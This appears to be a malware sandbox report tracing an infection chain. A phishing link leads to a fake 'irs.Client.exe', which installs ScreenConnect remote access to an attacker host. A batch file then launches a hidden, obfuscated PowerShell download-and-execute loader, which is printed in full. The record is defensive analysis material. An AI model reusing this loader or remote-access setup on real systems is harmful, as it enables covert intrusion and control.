msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 1964 1696 msedge.exe 84 PID 1696 wrote to memory of 2380 1696 msedge.exe 85 PID 1696 wrote to memory of 2380 1696 msedge.exe 85 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86 PID 1696 wrote to memory of 4744 1696 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://s6tmj.mjt.lu/lnk/AVwAAFW6A7oAAAAAAAAAA8kYNeQAAYKI7_QAAAAAACy0JQBnLz1xwUABtbMRRauPOv-Di8-6fgApOQU/0/uE1z8SManLuehFT6wLW-XQ/aHR0cHM6Ly9pci1zZWNmaWxlLmNvbS8?b=21⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe66e046f8,0x7ffe66e04708,0x7ffe66e047182⤵PID:2416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:22⤵PID:1964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:82⤵PID:4744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵PID:3976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:4188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:12⤵PID:4940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:12⤵PID:216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:82⤵PID:1912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4768 /prefetch:82⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:12⤵PID:4168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6064 /prefetch:82⤵PID:3656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:12⤵PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:12⤵PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:12⤵PID:1032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:12⤵PID:2292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2864
-
-
C:\Users\Admin\Downloads\irs.Client.exe"C:\Users\Admin\Downloads\irs.Client.exe"2⤵
- Manipulates Digital Signatures
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4888 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"3⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe"C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe"4⤵
- Executes dropped EXE
- Modifies registry class
PID:5556 -
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.ClientService.exe"C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cloudservmeta.com&p=8041&s=83a0ca4c-6344-443e-a070-0d8579e16390&k=BgIAAACkAABSU0ExAAgAAAEAAQDFjB2g4Qj6P0OOcaubTsssjqZiXywMluyeG%2bCLmQAKDlT6DfGyVZsalU3SBL%2fGwTwODVH8XOZ8mng6mpjWpi6W8REf0G2nj00QSE1T0gIuqWmgvF8xUiJ39mPaKanlx74d5Ywscq11tucZ6um%2b5Z7QrxKOxStdzLy23qwPGw6iORx8E4e1IOW%2fS5Q1PWS7uo5UFbCy0T5L0%2bwJqlyh6JFwjT2dUsLcbWRG1IA%2b6nSVohNhBbaoP3uWnhj5E60SAxhCf%2b0bwj%2bja7rOrcFv8mLmVbb9RJ2UPmn7wcJQ60BenbznHQ95limB5jS0%2b1U2rxtHuDDc2hyh9%2blggo0jCsjN&r=&i=" "1"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5868
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 9123⤵
- Program crash
PID:5396
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,8601631255316749946,16448833416832991956,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1400 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4492
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4648
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2476
-
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.ClientService.exe"C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cloudservmeta.com&p=8041&s=83a0ca4c-6344-443e-a070-0d8579e16390&k=BgIAAACkAABSU0ExAAgAAAEAAQDFjB2g4Qj6P0OOcaubTsssjqZiXywMluyeG%2bCLmQAKDlT6DfGyVZsalU3SBL%2fGwTwODVH8XOZ8mng6mpjWpi6W8REf0G2nj00QSE1T0gIuqWmgvF8xUiJ39mPaKanlx74d5Ywscq11tucZ6um%2b5Z7QrxKOxStdzLy23qwPGw6iORx8E4e1IOW%2fS5Q1PWS7uo5UFbCy0T5L0%2bwJqlyh6JFwjT2dUsLcbWRG1IA%2b6nSVohNhBbaoP3uWnhj5E60SAxhCf%2b0bwj%2bja7rOrcFv8mLmVbb9RJ2UPmn7wcJQ60BenbznHQ95limB5jS0%2b1U2rxtHuDDc2hyh9%2blggo0jCsjN&r=&i=" "1"1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5968 -
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe"C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe" "RunRole" "1087193f-0269-4936-935c-520f7d31c60c" "User"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6088 -
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe"C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe" "RunFile" "C:\Users\Admin\Documents\ConnectWiseControl\Temp\Girthline.cmd"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\ConnectWiseControl\Temp\Girthline.cmd" "4⤵PID:5608
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden " <#Energiministerierne Prfabrikaqr Inkhorn Regionsplanretningsliniernes Enchymatous #>;$Atomubaaden='Osculiferous';<#Sublittoral Actual Fodgngergades #>; function Retshjlp($Courtliest){If ($host.DebuggerEnabled) {$Kinsmen++;}$Faserummets=$Procentangivelserne+$Courtliest.'Length'-$Kinsmen; for ( $myopy=4;$myopy -lt $Faserummets;$myopy+=5){$Hovedkammerslags184=$myopy;$Unsimmered+=$Courtliest[$myopy];}$Unsimmered;}function Mactation($Unchaotically){ & ($Internation) ($Unchaotically);}$Sweatboxes=Retshjlp 'Ga lML gdoRe ezJordi BuelVaanlN fiaVroe/Cont ';$Underleverandrerne=Retshjlp ' ModTst.il,uffs Udr1Unte2Guld ';$Amtstue='bera[ etrNDewdESpertKol . lyS snuEFremRAnoeV ereI VraCSequeVel,PFlyvoCrieIDes NHam TF emMKorta LignGe.eAEndeGElvrETidsrP ec]Ak,e:rske:Sto.SV rmepreoCIsthUK beRBaaniM,dutIn iyS riP PonRUnveo isaT F aOIn oCDrawo,alelEkst=rand$Dep ulibenUak DDomme Equrtresl ,ocEtempvLepte Ud.rSmu,A OranRegnDKvatR UdseSaucrCa,yn C reBr e ';$Sweatboxes+=Retshjlp ' Rim5 ont.Nobb0Stat Pru,(Tes.WEc.liImpunSammdRettoGonawInitsCora HypeN SjkTU.lu Tusc1 Res0 All.Ta.e0She,;Slid SkatW IdeiHvidn Dep6Fra 4Sove; Asy ZinkxStom6Mono4baca;Trif EndrTri vTerb: Bvl1Uval3 Lat1Shau.ajou0 Tak)Res, U,deGimm,eByggc Wedk.iskoTing/Serp2 ove0Retu1Appl0Orei0nude1Pach0Un,i1F or Sym,FL mbiBlenr U aeCombfgrunouopsxMisy/Tjrn1inse3trak1Ra k.Tang0,ekl ';$Spegeskinken=Retshjlp ' EmoUTyndShosteRetlrcyk -IltoAPentGnimaE ,laNRe.iteg t ';$Indesneende=Retshjlp ' Waih P rtBu ntBl.npTo lsdist:C ra/ S o/ FedfMi diSelvlSikkeRer doutpnGaye. BeneBes uHalv/FistlSour9WeektforsE oltws imb No 9.edvsEnd,6UnmoaUnogaSin RO,tawCast5BaglfnegeyBageUHeckiPenaarenaCAllu0OmkllD,cofCam /TrilBAc er.efrn.oree S nsBorrd K,te ih sKnop. resrCha,aBorirreli ';$Revokers=Retshjlp 'Info>Af u ';$Internation=Retshjlp 'AutoI teeJurixSupe ';$Sublimeringen='Exanimated';$Forstvsnets='\Adressefelternes.Fre';Mactation (Retshjlp 'Spor$ScougB.grLBostOPleiBIndeapresl.upp:SyklOSca CS ruu G nlProtoArchsLap.PTrani KryN .ubAQuinL N n=Sori$ PuleRys,N Pl.vAcro: UndA traPbutiPEfteDS.akABranTM rsaHola+ ubb$Th rFTherO corr Q.iSG nktRev.V QuaSP ofn .neeDictT SmasB tr ');Mactation (Retshjlp 'Na.o$ lacG InflLev.oForbBMa.taWisdL For:D ssjS,lleIntrRD monBispbskalaAdvonArveeE ceGAbsuA Trad.rugEIndd=M.no$S edi l sNFjerDMoraeSt bsPlatN Loue OmleNonrNOchlDEpipE N n.RgtoSdacrPCynal SupiTw.ft Dod(Cadd$ SubR pakeVebgvJa aO C mkAsteE upeR Funsfris) Dow ');Mactation (Retshjlp $Amtstue);$Indesneende=$Jernbanegade[0];$Glutenin=(Retshjlp ' ese$.okagMur,LKlagoAf iB VeraPurllUret:AnskbBirkRTruni StrKbrygEPunkTudfrTNon ePandrho oIVespnValgG IndEKohrrregrS R,d= Obsn.ulsENon,wFind- NulOKickBFradJ P eeDiskCPat T am SnegsChroYAhuiS yttTaraECic M Vit. olsnFrede FirTGura.Trekw ChieMicrBStemc proLDeceIAab eAgelnW enTFami ');Mactation ($Glutenin);Mactation (Retshjlp 'Prol$Lir B Bagr Skui M dk .bees.lvtupgit rykeSt prDu ai AmpnIn eg Po.eq irr,raisudd..Bl,dH elteO.ela DeldUnpeeOrdir,elesFjan[ind,$DataS ScypCodieS.atgVense P csRneskForniNonun MalkTilre Re nOv r]Buis=F ct$ assSTopmwResoeopusa Bret tenbDervoluthxDrmmeFnd swede ');$Encephalocoele=Retshjlp ' ing$hostB S lrH,uliFrankJoshe nontBun tMonoe L nr VigiEldonYan.gSu ueOss rArb.s ven.FuniD B.loOve,wnormn PomlResso Veja PaadSpirFPra,iMy olNatieHipp( Qu $,irkIUnsanHelpdGrudeTorssNon nJoshe ejee Sdmn UnhdBruse Tvi,Morg$PumpS.iapcPr fuDy ptUdbueIggylEgyplMis aselvr AntiBisma Te ) Le ';$Scutellaria=$Oculospinal;Mactation (Retshjlp 'Stos$ estG H dlSalaO R tbHundaKandlBran:AutoDrtesEIrreTMitio KonnAu ie Af,rAppei esknSandg BiseTrinROve,n G ne BekSNaph=Pens(AkadTKolleScriS OuttHum -s gaPMatuA Yajt StyHRull Stea$AgousMi,iCAnodU epeT eaE S.kL ResLMisnACorpRfilmi,edka pe)Caec ');while (!$Detoneringernes) {Mactation (Retshjlp 'Sub $RigogSti lKnaroDerobCharaGamblTran:IstnUTilgd Hyls .yskT,rar Bili icegStn eTordnUnexeHjaesMask=Helt$R vitMonorKa duT uneKnst ') ;Mactation $Encephalocoele;Mactation (Retshjlp 'Ch rsMisttKommaFejdR RapTLexi- ForsMenulToupeStorEGi.pPDevi Trom4Laag ');Mactation (Retshjlp 'Con $ NetgTykmLI teoViftBSpytaskumlfinm:LaluDVejre,ootT ontoSal nOocyECo.lr ,iri Tunn ,ddg KlgePagur Heln PileKrseSPrak=Unex(insitSkane nthS actTPron-Rushp esta Pe T ManHEpim Hell$ An sImmuCFaciURelutNonbEUnciLspagLsv maSlofRUn.ei Crua nao) orh ') ;Mactation (Retshjlp ' gla$ ChoG Scrl,pvaO D,sBSa aAGrssL nd:trasaFortF tteS,rutA ,elt Unts RuseunstRTene3Ki.b=Shem$S.esGExt.lSomroGangBToucaGratLFejl:g.elUAkvdlFlanI DreDFre,ETyk l NoniA itgQuisEEjersferi+pole+ ang% Re.$.arnJLagrEacrorVernnju,bB Ki aUdvln odEBooggBarbaSeriDLi le ash.SpejC stroInlaUTegnNac,ttTwan ') ;$Indesneende=$Jernbanegade[$Afsatser3];}$Posttrial=317102;$Gengangerenes=30347;Mactation (Retshjlp 'sce $Af,aGTreslbr.eOSkraBSiksAStoflSem :JipiBSeyci udgD eae,ambreffeE l enNeocSL.ge Cabr=Spha AmmoGF stE Bo,tFlu -LrdsCUnicoFe lNsemitfrarEMyxonSulatMini R fi$Jea.sDemoC DigUS.mitS nhELagrlacerlSkolaFeltr Lo.IFul.a Non ');Mactation (Retshjlp 'Kuv,$ FesgF rgl,ecuoDevebD.ipaKamel.edu: MasKhi eoNak oabl.l fogodiplk .keaRestmCorpbDrooaDet xas=konf C,st[ anaSMi.eyLy.as DistGadeeReprmchao. AalC Ekso BednS dev.onteJuxtr ilbtUnev]bovl:.end:ArchFT.ltrGo soFo lmU taB Kl aW amsFraneId n6boni4E kaSR sttAstrrsenni loonRampg Ege(Ma i$RatiBEmi iCompd.leve RecrstraeMornn Va.sLib.)Shiv ');Mactation (Retshjlp 'Thim$beskGSingL MycoShocb IndaBiotlMu t:PrehDdip.EFrenmJammitranMHub OHyponHamudUngrE NonR SkunForeelnensArak1 T l1Exit5Schi Phil= Fed Mona[Unc sForhyDepus PhyTGuhaeHistmRejn.hym tUnsaeJunkxBorgtUngd.NoseEHeminDrifc lucoSp iDToakiunlin U iGDuft] lte:euph:HerpAGaars SniCFinaIStndiFlo..SemiGTranekoret.nfoSInddtB roRBajoiHa tN twaGBrne(Sher$DiscKAkt oudg OFasclBundOMaxiKMaskaSpirmKontBO.erabgeh)Assu ');Mactation (Retshjlp 'Bioc$LeonGSkivlBaldO ailbobduaant.LS en:BotaAbuttRT,llB,erbEEns JGrejdEm.rS F,rGMasqAStyrnDuppGBor,sNaa =Coro$ mpodShiiEmousMProtIBe omDasho SubN.ukcdfamiePostrdinenc tieAd aS Vi 1grot1Hank5Imdt.EndesBehaU GauBRi.sS esT.affr L.iI mbNUdsegBagt(S.ed$Ind pEutoObronsPostTSpigtNetvRDisriMortaOve,L Hen,Calo$Fla,gFjlleKantnskntGDe oATig nStamgBl nE JenrbesvEom iN eseLysaSStal)Vowe ');Mactation $Arbejdsgangs;"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5548
-
-
-
-
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe"C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe" "RunFile" "C:\Users\Admin\Documents\ConnectWiseControl\Temp\Girthline.cmd"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3764 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\ConnectWiseControl\Temp\Girthline.cmd" "4⤵PID:2408
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden " <#Energiministerierne Prfabrikaqr Inkhorn Regionsplanretningsliniernes Enchymatous #>;$Atomubaaden='Osculiferous';<#Sublittoral Actual Fodgngergades #>; function Retshjlp($Courtliest){If ($host.DebuggerEnabled) {$Kinsmen++;}$Faserummets=$Procentangivelserne+$Courtliest.'Length'-$Kinsmen; for ( $myopy=4;$myopy -lt $Faserummets;$myopy+=5){$Hovedkammerslags184=$myopy;$Unsimmered+=$Courtliest[$myopy];}$Unsimmered;}function Mactation($Unchaotically){ & ($Internation) ($Unchaotically);}$Sweatboxes=Retshjlp 'Ga lML gdoRe ezJordi BuelVaanlN fiaVroe/Cont ';$Underleverandrerne=Retshjlp ' ModTst.il,uffs Udr1Unte2Guld ';$Amtstue='bera[ etrNDewdESpertKol . lyS snuEFremRAnoeV ereI VraCSequeVel,PFlyvoCrieIDes NHam TF emMKorta LignGe.eAEndeGElvrETidsrP ec]Ak,e:rske:Sto.SV rmepreoCIsthUK beRBaaniM,dutIn iyS riP PonRUnveo isaT F aOIn oCDrawo,alelEkst=rand$Dep ulibenUak DDomme Equrtresl ,ocEtempvLepte Ud.rSmu,A OranRegnDKvatR UdseSaucrCa,yn C reBr e ';$Sweatboxes+=Retshjlp ' Rim5 ont.Nobb0Stat Pru,(Tes.WEc.liImpunSammdRettoGonawInitsCora HypeN SjkTU.lu Tusc1 Res0 All.Ta.e0She,;Slid SkatW IdeiHvidn Dep6Fra 4Sove; Asy ZinkxStom6Mono4baca;Trif EndrTri vTerb: Bvl1Uval3 Lat1Shau.ajou0 Tak)Res, U,deGimm,eByggc Wedk.iskoTing/Serp2 ove0Retu1Appl0Orei0nude1Pach0Un,i1F or Sym,FL mbiBlenr U aeCombfgrunouopsxMisy/Tjrn1inse3trak1Ra k.Tang0,ekl ';$Spegeskinken=Retshjlp ' EmoUTyndShosteRetlrcyk -IltoAPentGnimaE ,laNRe.iteg t ';$Indesneende=Retshjlp ' Waih P rtBu ntBl.npTo lsdist:C ra/ S o/ FedfMi diSelvlSikkeRer doutpnGaye. BeneBes uHalv/FistlSour9WeektforsE oltws imb No 9.edvsEnd,6UnmoaUnogaSin RO,tawCast5BaglfnegeyBageUHeckiPenaarenaCAllu0OmkllD,cofCam /TrilBAc er.efrn.oree S nsBorrd K,te ih sKnop. resrCha,aBorirreli ';$Revokers=Retshjlp 'Info>Af u ';$Internation=Retshjlp 'AutoI teeJurixSupe ';$Sublimeringen='Exanimated';$Forstvsnets='\Adressefelternes.Fre';Mactation (Retshjlp 'Spor$ScougB.grLBostOPleiBIndeapresl.upp:SyklOSca CS ruu 